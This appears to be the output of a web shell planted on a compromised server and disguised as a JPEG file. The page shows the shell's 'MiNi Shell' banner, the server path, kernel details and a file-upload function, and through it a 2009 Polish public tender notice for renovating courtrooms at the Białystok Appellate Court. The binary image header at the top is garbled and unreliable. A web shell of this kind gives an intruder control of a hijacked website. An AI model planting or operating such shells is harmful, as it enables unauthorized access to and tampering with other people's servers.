JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/94694-N-2009.html

<p class="kh_header"><b>Białystok: Roboty budowlane polegające na remoncie sal rozpraw II i III z dostosowaniem  ich do pomieszczeń administracyjnych w budynku Sądu Apelacyjnego w Białymstoku, ul. Mickiewicza 5- G-241-5/09.</b><br>
<b>Numer ogłoszenia: 94694 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Apelacyjny , ul. Mickiewicza 5, 15-213 Białystok, woj. podlaskie, tel. 085 7430470, faks 085 7329001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.sa.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane polegające na remoncie sal rozpraw II i III z dostosowaniem  ich do pomieszczeń administracyjnych w budynku Sądu Apelacyjnego w Białymstoku, ul. Mickiewicza 5- G-241-5/09..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Planowane prace remontowo-budowlane w  pomieszczeniach objętych postępowaniem (o łącznej powierzchni około 150 m2):

-demontaż podestów (sala rozpraw II i III wraz z pokojami narad),
-rozbiórka ścianki działowej (między salą rozpraw II i pokojem narad),
-uzupełnienie i remont podłóg/posadzek (w miejscach po rozebranej ściance działowej oraz pod podestami) - w pomieszczeniach występuje parkiet,
-wykonanie 2. nowych ścianek działowych (w sali rozpraw III),
-wykonanie 2. otworów drzwiowych z nadprożami,
-remont z przebudową wewnętrznych instalacji elektrycznych,
-remont wykończeń wnętrz,
-montaż nowych drzwi wewnętrznych (skrzydeł, ościeżnic i portali drzwiowych),
-renowacja lub wymiana stolarki drzwiowej (skrzydeł, ościeżnic i portali drzwiowych) - wybarwienie drzewa - zgodnie z kolorystyką ustaloną na ciągach komunikacyjnych I i II piętra budynku; klamki masywne z długim szyldem - mosiężne
(wzór jak w zastanych na I i II piętrze budynku),
-montaż cokołów drewnianych w pomieszczeniach (w kolorze stolarki drzwiowej o wysokości 15 cm - wzór - jak na korytarzach I i II piętra budynku),
-naprawa (udrożnienie) istniejących kanałów wentylacji grawitacyjnej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.12-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wyznacza wadium w kwocie 1500 złotych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O dopuszczenie do udziału w przetargu ograniczonym mogą ubiegać się Wykonawcy, którzy:
1)Posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, tj. zrealizowali w okresie ostatnich 3 lat przed wszczęciem postępowania (od kwietnia 2006 r. do marca 2009 r. ) minimum 1  robotę o wartości równej co najmniej: 200 000 zł, polegającą na wykonaniu robót budowlanych będących przedmiotem zamówienia (w nowo wznoszonym lub remontowanym obiekcie budowlanym). Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (np. w konsorcjum) mogą wykazać, że spełniają łącznie w/w warunek- ZNACZENIE WARUNKU - 70pkt.
2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Osoby zdolne do wykonania zamówienia powinny posiadać uprawnienia budowlane, uprawniające do wykonywania samodzielnych technicznych funkcji w budownictwie i wpisanymi na listę członków właściwej izby zawodowej.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia mogą wykazać ,że spełniają łącznie w/w warunek.
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:
a)osiągnęli w okresie ostatnich dwóch lat obrotowych średni roczny przychód netto ze sprzedaży (w każdym roku obrotowym) w wysokości nie mniejszej niż: 500 000 zł,  (ocena  warunku dokonana na podstawie danych z rachunków zysków i strat,  pozycja: Przychód netto ze sprzedaży produktów, towarów i materiałów lub Przychód netto ze sprzedaży i zrównane z nimi, a w przypadku wykonawców nie zobowiązanych do sporządzania rachunku zysków i strat  zeznanie roczne  dla osoby fizycznej - PIT )  - ZNACZENIE WARUNKU - 30pkt;
b)są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej na kwotę min.  150 000 PLN .
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia mogą  wykazać, że spełniają łącznie warunek pkt. 4 a i b;
5)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (na podstawie art. 24 ust. 1 i 2 ustawy).
Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Zamawiający zaprosi do składania ofert 5 wykonawców, którzy spełniają warunki udziału w postępowaniu    (  określone w ogłoszeniu o zamówieniu).
Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu, okaże się być większa niż określona w ogłoszeniu, zamawiający zaprosi do składania ofert wykonawców, którzy otrzymali najwyższą ocenę spełniania dwóch poniższych warunków:
1)WARUNEK: posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, tj. - zrealizowali w okresie ostatnich 3 latach przed wszczęciem postępowania (od  kwietnia 2006 r. do marca 2009 r.) minimum 1  robotę o wartości równej co najmniej: 200 000 zł polegającą na wykonaniu robót budowlanych tożsamych z robotami będącymi przedmiotem zamówienia (w nowo wznoszonym lub remontowanym obiekcie budowlanym). Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (np. w konsorcjum) mogą wykazać, że spełniają łącznie w/w warunek ; - ZNACZENIE WARUNKU - 70 pkt.
Ocena spełniania warunku dokonana zostanie w oparciu o następującą formułę:
 Wp=Wpob/Wpmax x 70 pkt.
Gdzie:
 Wp- ilość punktów przyznana za ocenę spełnienia warunku,
 Wpob- ilość  kwalifikowanych (zdefiniowanych powyżej) robót budowlanych wykazanych we wniosku badanym;
 Wpmax- maksymalna wykazana ilość  kwalifikowanych robót budowlanych, spośród wszystkich wniosków,
Zamówienie wykazane przez Wykonawcę we wniosku o dopuszczenie, bez dołączonego dokumentu potwierdzającego, iż zostało one wykonane należycie, zostanie potraktowane podczas oceny wniosku jako niewykonane. 
2)WARUNEK: osiągnęli w okresie ostatnich dwóch lat obrotowych średni roczny przychód netto ze sprzedaży (w każdym roku obrotowym) w wysokości nie mniejszej niż :  500 000 zł -ZNACZENIE WARUNKU - 30 pkt.
Ocena spełniania w/w warunku dokonana zostanie w oparciu o następującą formułę:
 Wp=Wpob/Wpmax x 30 pkt.
Gdzie:
 Wp- ilość punktów przyznana za ocenę spełnienia warunku,
 Wpob- suma rocznych przychodów netto ze sprzedaży osiągniętych w okresie ostatnich 2 lat obrotowych wykazanych we wniosku badanym;
 Wpmax- maksymalna suma rocznych przychodów netto ze sprzedaży osiągniętych w okresie ostatnich 2 lat obrotowych, spośród wszystkich wniosków,
Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu, okaże się być mniejsza niż określona w ogłoszeniu o zamówieniu, zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu wniosek o dopuszczenie do udziału w przetargu musi zawierać następujące oświadczenia i dokumenty:
1.1.oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych,
1.2.wykaz zrealizowanych przez Wykonawcę (rozpoczętych i zakończonych) w okresie ostatnich 3 lat przed wszczęciem postępowania robót budowlanych,  (od  kwietnia 2006 r. do marca 2009 r.)  polegających na wykonaniu robót budowlanych tożsamych z robotami będącymi  przedmiotem przetargu tj odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia ( nie mniej jak 200 000 zł każda), w nowo wznoszonym lub remontowanym obiekcie budowlanym. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (np. w konsorcjum) mogą wykazać, że spełniają łącznie w/w warunek. Do wykazu należy dołączyć dokumenty potwierdzające, iż roboty te zostały wykonane z należytą starannością. Z wykazu musi wynikać w sposób nie budzący wątpliwości, iż wykonawca wykonał co najmniej 1 robotę budowlaną tożsamą z robotami  będącymi przedmiotem przetargu). Wykaz musi zawierać następujące informacje: Opis zamówienia, wartość zamówienia, termin rozpoczęcia i zakończenia zamówienia, nazwa i adres zamawiającego na rzecz którego zamówienie było wykonywane. 
1.3.wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz  z danymi na temat ich kwalifikacji i posiadanych uprawnień, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Z wykazu musi jednoznacznie wynikać, iż wykonawca dysponuje osobami wymaganymi w opisue warunkach udziału w postępowaniu pkt. 2 . 
1.4dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, t.j. zaświadczenia z właściwej Izby Inżynierów Budownictwa potwierdzające  przynależność do izby oraz uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie ,  w specjalnościach dotyczących robót będących przedmiotem zamówienia  (art. 12 i 13 ustawy z dnia 7 lipca 1994 r. Prawo budowlane, t. jedn.: Dz. U. z 2000 r. Nr 106, poz. 1126 z późn. zm.),
1.5.rachunki zysków i strat, a w przypadku Wykonawców nie zobowiązanych do ich sporządzania, zeznanie roczne  dla osoby fizycznej ( PIT )- za dwa ostatnie lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy  - za ten okres,
1.6.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków;
1.7.aktualną informację z Krajowego Rejestru Karnego, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 Prawa zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków,
1.8.aktualną informację z Krajowego Rejestru Karnego, w zakresie określonym w art. 24 ust. 1 pkt 9 - Prawa zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków,
1.9.zaświadczenia  właściwego naczelnika urzędu skarbowego oraz  właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawionych na wcześniej niż 3 miesiące przed upływem terminu składania wniosków,
1.10.Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej na kwotę min. 150 000 PLN .
W przypadku podpisywania wniosku, oświadczeń, dokumentów lub poświadczania kopii dokumentów za zgodność z oryginałem przez pełnomocnika, do wniosku należy dołączyć stosowane pełnomocnictwo.
Ponadto wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć wraz z wnioskiem dokument stwierdzający ustanowienie przez nich pełnomocnika do reprezentowaniu ich w postępowaniu o udzielenie niniejszego zamówienia publicznego albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć dokumenty, o których mowa w pkt  1.1, 1.2,1.7, 1.8, 1.9 i 1.10 oddzielnie ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Apelacyjny w Białymstoku 
ul. Mickiewicza 5
15-213 Białystok, pokój 152.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 09:00, miejsce: Sąd Apelacyjny w Białymstoku 
ul. Mickiewicza 5
15-213 Białystok, pokój 152.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com